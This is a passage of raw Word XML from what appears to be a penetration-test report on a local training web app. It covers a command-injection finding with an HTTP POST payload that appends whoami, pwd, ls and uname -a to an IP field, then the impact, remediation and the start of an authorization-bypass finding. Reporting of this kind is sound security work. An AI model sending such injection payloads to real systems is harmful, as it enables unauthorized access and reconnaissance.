        <w:t>127.0.0.1 &amp;&amp; whoami &amp;&amp; pwd &amp;&amp; ls &amp;&amp; uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="1CD77F7D" w14:paraId="4E846DDD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>URL encode and submit the following POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="1CD77F7D" w14:paraId="4E7A488C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Observe the application response containing direct system command output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="17AD93B2" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="0EC0B086" w14:paraId="019DF195" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5D5109FA" w14:paraId="656E206A" w14:textId="5808C72D">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C8AD8C0" wp14:editId="1C7A35DF">
            <wp:extent cx="6400800" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91315813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158130" name="Picture 913158130"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6400800" cy="3476625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="0DE4B5B7" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="04ED4D7E" w14:textId="45B0AAC1">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="485EA61B" w:rsidP="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="0760CC66" w14:textId="632C07AF">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="363F4997" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Proof of Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="66204FF1" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="33E503D5" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Injection Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="35DE5B08" w14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E5FA3" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FA"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>POST /vulnerabilities/exec/ HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="271C7FCB" w14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E5FA3" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FA"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Host: localhost:4280</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="356A7C40" w:rsidRDefault="356A7C40" w14:paraId="2A7F2167"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Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="356A7C40" w:rsidRDefault="356A7C40" w14:paraId="5714D35C"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Cookie: PHPSESSID=&lt;session_id&gt;; security=low</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="2DBF0D7D" w14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E5FA3" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FA"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="356A7C40" w:rsidRDefault="356A7C40" w14:paraId="64C029BA" w14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E5FA3" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF3FA"/>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ip=127.0.0.1%20%26%26%20whoami%20%26%26%20pwd%20%26%26%20ls%20%26%26%20uname%20-a&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="6B62F1B3" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="0215A592" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Commands Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="5B21F8E1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>whoami — Retrieved current system user running the web server process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="27B756D4" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>pwd — Displayed the server working directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="73646775" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>ls — Listed all files and directories on the host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="3C322FAC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>uname -a — Revealed operating system version and kernel details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="02F2C34E" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="680A4E5D" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="19219836" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="65E104DF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="580BBB37" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>This vulnerability exposes the application to the following risks:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="6F6A292F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Full server reconnaissance and disclosure of sensitive system information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="44B99ED0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Credential theft through access to configuration files and environment variables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="0173CA75" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>File manipulation, creation, or deletion on the host filesystem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="2D6B2587" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Privilege escalation if the web server runs with elevated permissions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="668C7452" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Installation of malicious tools, backdoors, or reverse shells</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="4ECCDE0E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Remote system takeover and persistent attacker access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3D643D05" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Lateral movement to connected internal infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="63C08C34" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Because exploitation enables direct server interaction with minimal effort, this is a maximum-risk finding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00966105" w14:paraId="296FEF7D" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="52F086F1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Recommended Fix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="3969A630" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Avoid invoking operating system shell commands using user-controlled input</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="340CE4CD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Use secure language APIs or libraries instead of shell execution where possible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="1F0EC1E5" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Implement strict allowlist validation — reject any input that is not a valid IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="356A7C40" w14:paraId="0AC876E6" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="356A7C40">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Sanitize and reject shell metacharacters: ; &amp;&amp; || | ` $() &lt; &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="2D43E0DC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Run application services with least privilege permissions (non-root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="685A47CA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Isolate application runtime environments using containers or sandboxing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidRDefault="00191B85" w14:paraId="36EFEC62" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Implement server-side monitoring and alerting for anomalous command execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="0EC0B086" w14:paraId="70198DDA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Perform regular secure code reviews and penetration testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5DD80BF7" w14:paraId="5E61DDE2" w14:textId="7E199CBB">
      <w:pPr>
        <w:pageBreakBefore/>
        <w:shd w:val="clear" w:color="auto" w:fill="2E5FA3"/>
        <w:spacing w:before="200" w:after="100"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">F-004  | </w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B" w:rsidR="7446F5D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="485EA61B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass Leading to Unauthorized Administrative Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="09DDFFFD" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>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rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="1CF22FF2"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1844F444" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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2428AB07" w:rsidRDefault="2428AB07" w14:paraId="2EF6BAE6" w14:textId="1F6CA81A">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Authorization Bypass Leading to Unauthorized Administrative Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="1AAE4DF2"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41EBBA1E" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1" w:space="0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FADBD8"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="485EA61B" w:rsidRDefault="485EA61B" w14:paraId="3818FFD4" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="3D481AC0"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000F2D8F" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score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485EA61B" w:rsidRDefault="485EA61B" w14:paraId="711FFBB8" w14:textId="762C28CF">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9.</w:t>
            </w:r>
            <w:r w:rsidRPr="485EA61B" w:rsidR="5A0E500C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="35AFEDF0"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444F8CE4" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS Vector</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7F68EE16" w:rsidRDefault="7F68EE16" w14:paraId="7384B251" w14:textId="457F8CF4">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="72BEE428"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04F2013B" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Category</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69DFF26C" w:rsidRDefault="69DFF26C" w14:paraId="474E0463" w14:textId="358BEF55">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A01: Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="485EA61B" w:rsidTr="485EA61B" w14:paraId="3AA139E6"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6BF7B8DF" w14:textId="77777777">
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Affected URL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65692644" w:rsidP="485EA61B" w:rsidRDefault="65692644" w14:paraId="2E51FDA0" w14:textId="3369C03B">
            <w:pPr>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http://localhost:4280/login.php</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="485EA61B">
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>http://localhost:4280/vulnerabilities/authbypass/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="00966105" w14:paraId="00BA6DC9" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="5DD80BF7" w14:paraId="363CB4E4" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="heading20"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5FA3" w:sz="4" w:space="2"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00966105" w:rsidP="485EA61B" w:rsidRDefault="25326D79" w14:paraId="197688D0" w14:textId="0359110C">
      <w:pPr>
